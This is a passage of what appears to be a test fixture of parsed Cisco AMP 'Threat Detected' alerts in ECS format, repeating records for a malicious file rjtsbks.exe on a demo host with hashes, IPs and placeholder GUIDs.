Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6159251512150196000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "90:61:b5:c9:13:79", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "90:61:b5:c9:13:79" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6159251512150196251", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "file": { + "name": "rjtsbks.exe", + "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "hash": { + "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + 
"sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "md5": "209a288c68207d57e0ce6e60ebf60729" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_TeslaCrypt" + ], + "hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_TeslaCrypt", + "hostname": "Demo_TeslaCrypt" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581736759Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":318000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196250\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6159251512150196000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "90:61:b5:c9:13:79", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "90:61:b5:c9:13:79" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6159251512150196250", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "file": { + "name": "rjtsbks.exe", + "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "hash": { + "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + 
"sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "md5": "209a288c68207d57e0ce6e60ebf60729" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_TeslaCrypt" + ], + "hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_TeslaCrypt", + "hostname": "Demo_TeslaCrypt" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581738562Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":303000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196249\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6159251512150196000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "90:61:b5:c9:13:79", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "90:61:b5:c9:13:79" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6159251512150196249", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "file": { + "name": "rjtsbks.exe", + "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "hash": { + "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + 
"sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "md5": "209a288c68207d57e0ce6e60ebf60729" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_TeslaCrypt" + ], + "hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_TeslaCrypt", + "hostname": "Demo_TeslaCrypt" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581740367Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":287000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196248\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6159251512150196000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "90:61:b5:c9:13:79", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "90:61:b5:c9:13:79" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6159251512150196248", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "file": { + "name": "rjtsbks.exe", + "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "hash": { + "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + 
"sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "md5": "209a288c68207d57e0ce6e60ebf60729" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_TeslaCrypt" + ], + "hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_TeslaCrypt", + "hostname": "Demo_TeslaCrypt" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581742294Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":256000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196247\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6159251512150196000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "90:61:b5:c9:13:79", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "90:61:b5:c9:13:79" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6159251512150196247", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "file": { + "name": "rjtsbks.exe", + "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "hash": { + "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + 
"sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "md5": "209a288c68207d57e0ce6e60ebf60729" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_TeslaCrypt" + ], + "hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_TeslaCrypt", + "hostname": "Demo_TeslaCrypt" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581744207Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196246\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6159251512150196000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "90:61:b5:c9:13:79", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "90:61:b5:c9:13:79" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6159251512150196246", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "file": { + "name": "rjtsbks.exe", + "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "hash": { + "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + 
"sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "md5": "209a288c68207d57e0ce6e60ebf60729" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_TeslaCrypt" + ], + "hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_TeslaCrypt", + "hostname": "Demo_TeslaCrypt" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581746351Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196245\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6159251512150196000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "90:61:b5:c9:13:79", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "90:61:b5:c9:13:79" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6159251512150196245", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "file": { + "name": "rjtsbks.exe", + "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "hash": { + "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + 
"sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "md5": "209a288c68207d57e0ce6e60ebf60729" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_TeslaCrypt" + ], + "hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_TeslaCrypt", + "hostname": "Demo_TeslaCrypt" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581748237Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":209000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196244\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6159251512150196000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "90:61:b5:c9:13:79", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "90:61:b5:c9:13:79" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6159251512150196244", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "file": { + "name": "rjtsbks.exe", + "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "hash": { + "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + 
"sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "md5": "209a288c68207d57e0ce6e60ebf60729" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_TeslaCrypt" + ], + "hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_TeslaCrypt", + "hostname": "Demo_TeslaCrypt" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:17.581750120Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":178000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196243\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6159251512150196000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "90:61:b5:c9:13:79", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "90:61:b5:c9:13:79" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6159251512150196243", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "file": { + "name": "rjtsbks.exe", + "path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "hash": { + "sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + 
